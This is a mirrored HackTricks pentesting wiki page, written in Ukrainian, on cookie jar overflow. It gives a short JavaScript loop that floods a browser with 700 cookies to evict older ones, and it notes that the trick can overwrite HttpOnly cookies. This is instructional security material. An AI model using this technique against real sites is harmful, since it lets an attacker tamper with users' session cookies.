maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

23 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{{#include ../../banners/hacktricks-training.md}}
Браузери мають **обмеження на кількість кукі**, які вони можуть зберігати для сторінки. Тоді, якщо з якоїсь причини вам потрібно **зробити кукі невидимими**, ви можете **переповнити банку з кукі**, оскільки найстаріші з них будуть видалені першими:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Зверніть увагу, що сторонні куки, які вказують на інший домен, не будуть перезаписані.
> [!CAUTION]
> Цей напад також можна використовувати для **перезапису HttpOnly куків, оскільки ви можете їх видалити, а потім скинути з потрібним вам значенням**.
>
> Перевірте це в [**цьому пості з лабораторією**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink